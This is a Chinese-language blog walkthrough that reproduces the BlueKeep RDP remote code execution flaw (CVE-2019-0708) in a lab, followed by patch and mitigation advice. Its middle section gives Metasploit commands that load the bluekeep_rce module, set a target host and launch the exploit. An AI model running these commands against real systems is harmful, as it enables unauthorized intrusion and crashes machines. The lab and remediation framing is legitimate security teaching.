前言:
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。
准备工具:
metasploit-framework
环境准备:
Kali 192.168.75.129 (攻击)
Win7 sp1/x64 192.168.75.131 (被攻击)开始复现 :
1、为了顺利复现成功,需要将被攻击机的远程桌面设为允许,防火墙也需要关掉。
需要注意的一点是,我们的靶机需要开启允许任意版本连接
2、启动MSF
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce ##启动0708exp脚本 出现则证明成功导入rb文件
3、攻击利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce ##进入模块
show options ##查询可选项
set rhost 192.168.75.131 ##设置目标
set target 2 ##设置级别 ps一开始设置target 3 vm那个,蓝屏了、设置2就没有问题了
exploit ##启动攻击
目标主机出现蓝屏
奇怪的是,不管是Windows7 还是Windows Server 2008 Windows Server 2003 蓝屏次数比获取到shell的次数多了不止几倍。
修复方案:
1. 目前软件厂商微软已经发布了漏洞相应的补丁:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019- 0708#ID0EWIAC
Windows XP 及Windows 2003可以在以下链接下载补丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708
2. 临时解决方案
如暂时无法更新补丁,可以通过在系统上启用网络及身份认证(NLA)以暂时规避该漏洞影响。
在企业外围防火墙阻断TCP端口3389的连接,或对相关服务器做访问来源过滤,只允许可信IP连接。
如无明确的需求,可禁用远程桌面服务。声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
Accelerate Your Web Development Career with Pablo-Guides.com!